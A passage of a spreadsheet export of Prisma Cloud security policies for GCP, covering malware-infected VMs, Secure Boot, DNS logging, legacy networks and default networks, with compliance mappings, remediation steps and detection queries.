        </is>
      </c>
      <c r="O2849" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2849" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2849" t="inlineStr"/>
      <c r="R2849" t="inlineStr"/>
      <c r="S2849" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2849" t="b">
        <v>0</v>
      </c>
      <c r="U2849" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2849" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2849" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are affected by malware and are connected with remote systems known for malware activities.
Malware activity includes activity from viruses, trojans, worms, ransomware, botnet, spambot and other types of malware. If network connectivity with remote systems known for malware activity is observed on the GCP VM instance, it could indicate that the instance is already has been compromised and the malware is currently in operation.
Immediate attention is required to remediate the malware reported for the GCP VM instances as soon as possible and investigate suspicious network activities.</t>
        </is>
      </c>
      <c r="X2849" t="inlineStr">
        <is>
          <t>[MALWARE]
Including files flagged as malware in a host filesystem poses significant security risks. It can lead to system infections, data breaches, and application disruptions. Maintain a secure environment by excluding such files from hosts.
[ANOMALY]
Investigate, backup, isolate, and block suspicious IP addresses associated with potential security threats:
1. Start by investigating all relevant logs for unusual activity. This includes server logs, application logs, firewall logs, and intrusion detection system logs. Look for any connections from the suspicious IP address and note any abnormal activity. Use your cloud provider's logging services to obtain and analyze these logs.
2. If a compute resource is likely to be compromised, perform a comprehensive backup of all data and configurations. This can be done using the built-in backup services of your cloud provider.
3. After a successful backup, isolate the potentially compromised resource to prevent further damage. This could involve moving the resource to a separate network, or shutting down the resource until further notice.
4. Create and apply firewall rules across your cloud environment to block all traffic from the suspicious IP address. This should be done on all ingress points to your environment to prevent any further malicious activity.
5. Conduct a thorough review of the incident. This includes understanding how the malicious activity was able to occur, and implementing preventive measures to avoid a similar incident in the future. This may involve patching software vulnerabilities, strengthening firewall rules, and improving intrusion detection mechanisms.</t>
        </is>
      </c>
      <c r="Y2849" t="inlineStr"/>
      <c r="Z2849" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('Traffic to a suspicious IP address associated with Ransomware activity' or 'Traffic from a suspicious IP address associated with Ransomware activity' or 'Traffic from a suspicious IP address associated with Botnet activity' or 'Traffic to a suspicious IP address associated with Botnet activity' or 'Traffic to a suspicious IP address associated with Linux Malware activity' or 'Traffic from a suspicious IP address associated with Linux Malware activity' or 'Spambot activity from a server inside monitored cloud accounts'))</t>
        </is>
      </c>
      <c r="AA2849" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2849" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:10</t>
        </is>
      </c>
      <c r="AC2849" t="inlineStr"/>
      <c r="AD2849" t="b">
        <v>1</v>
      </c>
      <c r="AE2849" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2849" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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49" t="inlineStr">
        <is>
          <t>8c485cbf-d0a3-416d-8791-ab1d0b25afc3</t>
        </is>
      </c>
      <c r="AI2849" t="inlineStr">
        <is>
          <t>0cd25764-9ad0-4cce-8815-1c4dbeeb2d71</t>
        </is>
      </c>
      <c r="AJ2849" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2849" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2850">
      <c r="A2850" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2850" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2850" s="2" t="inlineStr"/>
      <c r="D2850" t="inlineStr"/>
      <c r="E2850" t="inlineStr"/>
      <c r="F2850" t="inlineStr"/>
      <c r="G2850" t="b">
        <v>1</v>
      </c>
      <c r="H28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50" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2850" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2850" t="inlineStr">
        <is>
          <t>GCP VM instance with Shielded VM Secure Boot disabled</t>
        </is>
      </c>
      <c r="L2850" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2850" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2850" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2850" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2850" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2850" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2850" t="inlineStr">
        <is>
          <t>IM-4</t>
        </is>
      </c>
      <c r="S2850" t="inlineStr"/>
      <c r="T2850" t="b">
        <v>0</v>
      </c>
      <c r="U2850" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2850" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2850" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that have Shielded VM Secure Boot disabled.
Secure Boot is a security feature that ensures only trusted, digitally signed software runs during the boot process of a computer. Enabling it helps protect against malware and unauthorized software by verifying the integrity of the bootloader and operating system. Without Secure Boot, systems are vulnerable to rootkits, bootkits, and other malicious code that can compromise the system from the start, making it difficult to detect and remove such threats.
It is recommended to enable Shielded VM secure boot for GCP VM instances.</t>
        </is>
      </c>
      <c r="X2850" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate to 'Compute Engine' and then 'VM instances'
3. Click on the reported VM name
4. Stop the VM by clicking on the 'STOP' button. Click the 'STOP' button on the confirmation dialogue
5. Once the the VM has been stopped, click on the 'EDIT' button
6. Under 'Shielded VM', enable 'Turn on Secure Boot'
7. Click on 'Save'
8. Click on 'START/RESUME' from the top menu.</t>
        </is>
      </c>
      <c r="Y2850" t="inlineStr"/>
      <c r="Z2850" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = status equals RUNNING and name does not start with "gke-" and (shieldedInstanceConfig does not exist or shieldedInstanceConfig.enableSecureBoot is false )</t>
        </is>
      </c>
      <c r="AA2850" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2850" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2850" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-1266</t>
        </is>
      </c>
      <c r="AD2850" t="b">
        <v>1</v>
      </c>
      <c r="AE2850" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2850" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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50" t="inlineStr">
        <is>
          <t>f4875042-9413-4a61-9ee8-0b6fbea9ff10</t>
        </is>
      </c>
      <c r="AI2850" t="inlineStr">
        <is>
          <t>5be388f7-73af-4f44-a2d8-5b43d1dbcc74</t>
        </is>
      </c>
      <c r="AJ2850" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2850" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2851">
      <c r="A2851" t="inlineStr">
        <is>
          <t>RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO 27002:2022, Risk Management in Technology (RMiT), Telecommunications Security Act - TSA, Australian Energy Sector Cyber Security Framework (AESCSF), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, CIS v1.2.0 (GCP), ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8, GDPR, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CIS v1.3.0 (GCP), PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, CIS v3.0.0 (GCP) Level 1, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, PCI DSS v4.0, CIS v2.0.0 (GCP) Level 1, SOC 2, HIPAA, Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CRI Profile v1.2.1, CSA CCM v.4.0.6, ITSG-33, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2851" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2851" s="2" t="inlineStr"/>
      <c r="D2851" t="inlineStr"/>
      <c r="E2851" t="inlineStr"/>
      <c r="F2851" t="inlineStr"/>
      <c r="G2851" t="b">
        <v>0</v>
      </c>
      <c r="H28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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2851" t="inlineStr">
        <is>
          <t>gcloud-compute-networks</t>
        </is>
      </c>
      <c r="K2851" t="inlineStr">
        <is>
          <t>GCP VPC network not configured with DNS policy with logging enabled</t>
        </is>
      </c>
      <c r="L2851" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2851" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2851" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2851" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2851" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2851" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2851" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2851" t="inlineStr"/>
      <c r="T2851" t="b">
        <v>0</v>
      </c>
      <c r="U2851" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2851" t="inlineStr">
        <is>
          <t>gcloud-compute-networks-list</t>
        </is>
      </c>
      <c r="W2851" t="inlineStr">
        <is>
          <t>This policy identifies the GCP VPC networks which are not configured with DNS policy with logging enabled. Monitoring of Cloud DNS logs provides visibility to DNS names requested by the clients within the VPC. These logs can be monitored for anomalous domain names and evaluated against threat intelligence. It is recommended to enable DNS logging for all the VPC networks.
Note: For full capture of DNS, firewall must block egress UDP/53 (DNS) and TCP/443 (DNSover HTTPS) to prevent client from using external DNS name server for resolution.</t>
        </is>
      </c>
      <c r="X2851" t="inlineStr">
        <is>
          <t>To add DNS server policy with logging to a VPC network,
1. Login to GCP console
2. Navigate to service 'VPC network'(Left Panel)
3. Click on the alerting VPC network
4. Click on 'EDIT'
5. Under 'DNS server policy' dropdown, select an available service policy or 'create a new server policy' as required
Link: https://cloud.google.com/dns/docs/policies#creating 
6. Click on 'SAVE'
To enable logging to a DNS policy that is attached to a VPC follow the below reference,
1. Login to GCP console
2. Navigate to service 'VPC network'(Left Panel)
3. Click on the alerting VPC network
4. Click on the attached 'DNS server policy'
5. Click on 'EDIT POLICY'
6. Under section 'Logs' select 'On'
7. Click on 'SAVE'</t>
        </is>
      </c>
      <c r="Y2851" t="inlineStr"/>
      <c r="Z2851" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-networks-list' as X; config from cloud.resource where api.name = 'gcloud-dns-policy' as Y; filter 'not($.Y.networks[*].networkUrl contains $.X.name and $.Y.enableLogging is true)'; show X;</t>
        </is>
      </c>
      <c r="AA2851" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2851" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2851" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-854</t>
        </is>
      </c>
      <c r="AD2851" t="b">
        <v>1</v>
      </c>
      <c r="AE2851" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2851" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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1" t="inlineStr">
        <is>
          <t>8348b287-44a3-4b52-9db2-2194392a28ba</t>
        </is>
      </c>
      <c r="AI2851" t="inlineStr">
        <is>
          <t>ce3803de-a27d-404c-b086-ba85518fee89</t>
        </is>
      </c>
      <c r="AJ2851" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2851" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2852">
      <c r="A2852" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, APRA (CPS 234) Information Security, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NYDFS 23 CRR-NY 500.0, NIST SP 800-172, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS v1.3.0 (GCP), Fedramp (Moderate), ISO 27001:2013, Rehan, NIST 800-53 Rev4, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, NIST 800-53 Rev 5, ISO/IEC 27017:2015, Copy of CIS Controls v8, CIS v1.1.0 (GCP), Secure Controls Framework (SCF) - 2024.2, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, CIS Controls v8, NIST 800-53 Rev4, CIS v3.0.0 (GCP) Level 1, NIST CSF, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Brazilian Data Protection Law (LGPD), Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, ISO/IEC 27002:2013, PCI DSS v3.2.1, Risk Management in Technology (RMiT), CIS v1.0.0 (GCP), ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST 800-53 Rev4, NIST 800-53 Rev 5, ISO/IEC 27002:2013, NIST 800-53 Rev 5, Fedramp (Moderate), CIS v2.0.0 (GCP) Level 1, APRA (CPS 234) Information Security, NIST SP 800-171 Revision 3, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, CIS v1.2.0 (GCP), NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2852" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2852" s="2" t="inlineStr"/>
      <c r="D2852" t="inlineStr"/>
      <c r="E2852" t="inlineStr"/>
      <c r="F2852" t="inlineStr"/>
      <c r="G2852" t="b">
        <v>1</v>
      </c>
      <c r="H28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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2852" t="inlineStr">
        <is>
          <t>gcloud-compute-networks</t>
        </is>
      </c>
      <c r="K2852" t="inlineStr">
        <is>
          <t>GCP project is configured with legacy network</t>
        </is>
      </c>
      <c r="L2852" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2852" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2852" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2852" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2852" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2852" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R2852" t="inlineStr">
        <is>
          <t>AC-17 (2)</t>
        </is>
      </c>
      <c r="S2852" t="inlineStr"/>
      <c r="T2852" t="b">
        <v>0</v>
      </c>
      <c r="U2852" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2852" t="inlineStr">
        <is>
          <t>gcloud-compute-networks-list</t>
        </is>
      </c>
      <c r="W2852" t="inlineStr">
        <is>
          <t>This policy identifies the projects which have configured with legacy networks. Legacy networks have a single network IPv4 prefix range and a single gateway IP address for the whole network. Subnetworks cannot be created in a legacy network. Legacy networks can have an impact on high network traffic projects and subject to the single point of failure.</t>
        </is>
      </c>
      <c r="X2852" t="inlineStr">
        <is>
          <t>For each Google Cloud Platform project,
Follow the documentation and delete the reported network which is in the legacy mode:
https://cloud.google.com/vpc/docs/using-legacy 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-legacy-networks-do-not-exist-for-a-project
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-legacy-networks-do-not-exist-for-a-project</t>
        </is>
      </c>
      <c r="Y2852" t="inlineStr"/>
      <c r="Z2852" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-networks-list' AND json.rule = 'autoCreateSubnetworks does not exist'
{"category":"Networking","resourceTypes":["google_compute_network"]}</t>
        </is>
      </c>
      <c r="AA2852" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2852" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2852" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-220-CKV2_GCP_2</t>
        </is>
      </c>
      <c r="AD2852" t="b">
        <v>1</v>
      </c>
      <c r="AE2852" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2852" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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2" t="inlineStr">
        <is>
          <t>fa5df1d7-40d6-4629-a1a8-a7a6758d4a55</t>
        </is>
      </c>
      <c r="AI2852" t="inlineStr">
        <is>
          <t>5b9d9b21-bba4-4e05-82ec-ba6ff67b3f4a</t>
        </is>
      </c>
      <c r="AJ2852" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2852" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2853">
      <c r="A2853" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, CIS Controls v8.1, ISO 27001:2013, ISO/IEC 27002:2013, CIS v3.0.0 (GCP) Level 2, CIS v1.3.0 (GCP), NIST 800-53 Rev4, CIS v1.1.0 (GCP), NIST 800-53 Rev 5, CIS Controls v7.1, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, Secure Controls Framework (SCF) - 2024.2, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, NIST 800-53 Rev4, CIS Controls v7.1, ISO 27001:2013, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 3, Fedramp (Moderate), Telecommunications Security Act - TSA, Brazilian Data Protection Law (LGPD), Insurance Regulatory And Development Authority Of India, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, ISO/IEC 27018:2019, PCI DSS v4.0, NIST CSF, NIST 800-53 Rev4, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, NIST 800-53 Rev 5, Fedramp (Moderate), Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, CIS Controls v8, Copy of CIS Controls v8, NIST SP 800-171 Revision 3, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, FFIEC, ISO 27001:2013, CIS v2.0.0 (GCP) Level 2, ISO/IEC 27002:2013, NIST 800-53 Rev4, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Sarbanes Oxley Act (SOX), Rehan, CIS v1.2.0 (GCP), CSA CCM v.4.0.1, PCI DSS v4.0, CIS v1.0.0 (GCP), Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2853" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2853" s="2" t="inlineStr"/>
      <c r="D2853" t="n">
        <v>0</v>
      </c>
      <c r="E2853" t="n">
        <v>12</v>
      </c>
      <c r="F2853" t="n">
        <v>0</v>
      </c>
      <c r="G2853" t="b">
        <v>1</v>
      </c>
      <c r="H28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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2853" t="inlineStr">
        <is>
          <t>gcloud-compute-networks</t>
        </is>
      </c>
      <c r="K2853" t="inlineStr">
        <is>
          <t>GCP project is using the default network</t>
        </is>
      </c>
      <c r="L2853" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2853" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2853" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2853" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2853" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2853" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2853" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2853" t="inlineStr"/>
      <c r="T2853" t="b">
        <v>0</v>
      </c>
      <c r="U2853" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2853" t="inlineStr">
        <is>
          <t>gcloud-compute-networks-list</t>
        </is>
      </c>
      <c r="W2853" t="inlineStr">
        <is>
          <t>This policy identifies the projects which have default network configured. It is recommended to use network configuration based on your security and networking requirements, you should create your network and delete the default network.</t>
        </is>
      </c>
      <c r="X2853" t="inlineStr">
        <is>
          <t>1.Login to GCP Portal
2.Goto VPC network (Left panel)
3.Click on the reported default network
4.Click on 'DELETE VPC NETWORK'
5.Create a new VPC network according to your requirement
More info: https://cloud.google.com/vpc/docs/vpc#firewall_rules 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-27
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-27</t>
        </is>
      </c>
      <c r="Y2853" t="inlineStr"/>
      <c r="Z2853" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-networks-list' AND json.rule =  'name equals default'
{"category":"Networking","resourceTypes":["google_project"]}</t>
        </is>
      </c>
      <c r="AA2853" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2853" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2853" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-206-CKV_GCP_27</t>
        </is>
      </c>
      <c r="AD2853" t="b">
        <v>1</v>
      </c>
      <c r="AE2853" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2853" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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3" t="inlineStr">
        <is>
          <t>c2cf4439-9ac2-44b8-a0d2-7076cf82c29a</t>
        </is>
      </c>
      <c r="AI2853" t="inlineStr">
        <is>
          <t>8e8236e9-8e8f-4ab0-a953-9f68f6cf602d</t>
        </is>
      </c>
      <c r="AJ2853" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2853" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2854">
      <c r="A2854" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), ISO 27001:2013, APRA (CPS 234) Information Security, PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, CIS v1.3.0 (GCP), ISO 27002:2022, Risk Management in Technology (RMiT), Australian Energy Sector Cyber Security Framework (AESCSF), NIST 800-53 Rev4, ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, NIST 800-53 Rev 5, PCI DSS v4.0, MITRE ATT&amp;CK v12, NIST 800-53 Rev4, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), CIS v1.2.0 (GCP), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, GDPR, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, ISO 27001:2013, kfirdaus AWS Account-CS, PCI DSS v4.0, ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, CIS v1.1.0 (GCP), HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, ISO 27001:2013, CSA CCM v4.0.12, NIST 